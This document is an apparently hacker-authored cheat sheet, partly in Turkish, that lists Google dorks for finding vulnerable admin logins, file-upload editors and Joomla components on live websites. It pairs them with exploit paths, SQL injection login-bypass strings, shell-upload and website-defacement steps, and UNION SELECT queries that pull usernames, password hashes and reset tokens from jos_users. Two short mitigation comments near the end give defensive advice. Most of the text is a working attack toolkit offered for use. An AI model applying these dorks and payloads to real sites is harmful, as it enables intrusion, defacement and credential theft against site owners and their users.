inurl:”/admin/saveannounce_upload.asp” inurl:”admin/eWebEditor/Upload.asp” inurl:”UploadFile/upload.asp” #WEBWİZ ACİGİ (RTE UPLOAD ACIGI ) inurl:rte/my_documents/my_files/ inurl:/my_documents/my_files/ #exloit: /rte/RTE_popup_file_atch.asp #Editör açığı inurl:editor/assetmanager/ #(arama kodu geliştirilebilir) #EXPLOİT : /Editor/assetmanager/assetmanager.asp #Joomla upload açıgı inurl index.php?option=com_expose #Exploit: administrator/components/com_expose/uploadimg.php #Uploadin gittigi yer : /components/com_expose/expose/img/ #Sitefinity: Login upload açıgı inurl:”Sitefinity: Login” #exploit: Sitefinity/UserControls/Dialogs/ImageEditorDialog.aspx #Auto Login For Joomla Dork .:old:. inurl:/administrator/index.php?autologin=1 #--- #BYPASS ADMIN ACCESS #Dorks: #Code: inurl:admin.asp inurl:adminlogin.aspx inurl:admin/index.php inurl:administrator.php inurl:administrator.asp inurl:login.asp inurl:login.aspx inurl:login.php inurl:admin/index.php inurl:adminlogin.aspx #Code: #‘ or 1=1 – #1'or’1'=’1 #admin’– #” or 0=0 – #or 0=0 – #‘ or 0=0 # #” or 0=0 # #or 0=0 # #‘ or ‘x’='x #” or “x”=”x #‘) or (‘x’='x #‘ or 1=1– #” or 1=1– #or 1=1– #‘ or a=a– #” or “a”=”a #‘) or (‘a’='a #“) or (“a”=”a #hi” or “a”=”a #hi” or 1=1 – #hi’ or 1=1 – #hi’ or ‘a’='a #hi’) or (‘a’='a #---- #Joomla Component com_smartformer shell upload #Google Dork inurl:"index.php?option=com_smartformer" #& upload shell.php #Your shell : #http://localhost/components/com_smartformer/files/yourshell.php #--- #Ministry Web Designing Multiple Vulnerabilities #exploit bypass to login: #user: '=' 'or' #pass: '=' 'or' #Vunlerable Sections: inurl:/downloadcounter/admin/login.php inurl:/mediaprogram/admin/index.php inurl:/churchprogram/login.php #---- #(Deface)Exploit (Remote Deface ) Joomla Component #Dork : inurl:index.php?option=com_fabrik #Exploit : /index.php?option=com_fabrik&c=import&view=import&filetype=csv&table=1 #--- #[Priv8] Joomla Com_content exploit - defacing joomla websites #Dork : 
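inurl:index.php?option=com_content & "/mambots/editors/fckeditor" #Vulnerable File : mambots/editors/fckeditor/editor/filemanager/browser/default/browser.html?Type=File&Connector=connectors/php/connector.php #You can exploit this vulnerable joomla component and deface joomla websites and you can also sometimes upload your shell #Mitigation: the exposure here is the editor's bundled file-manager connector being reachable from the web; remove or disable the filemanager connectors under mambots/editors/fckeditor, or deny the path at the web server, and review access logs for requests to connector.php and for unexpected files in the upload directory #---- #exploit joomla "com_artforms" reset password #Dork : inurl:"option com_artforms" #/index.php?option=com_artforms&task=vferforms&id=1+UNION+SELECT+1,2,3,version(),5,concat_ws(email,0x3a,username,0x3a,password)+from+jos_users-- #/index.php?option=com_user&view=reset #/index.php?option=com_artforms&task=vferforms&id=1+UNION+SELECT+1,2,3,version(),5,concat_ws(username,0x3a,activation)+from+jos_users #Mitigation: the requests above show the id parameter of task=vferforms reaching the SQL query unescaped, which exposes jos_users (password hashes and reset activation tokens); update or remove com_artforms, cast id to an integer or bind it as a query parameter, alert on UNION/SELECT keywords in that parameter, and if such requests appear in logs treat the stored hashes and activation tokens as disclosed and force password resets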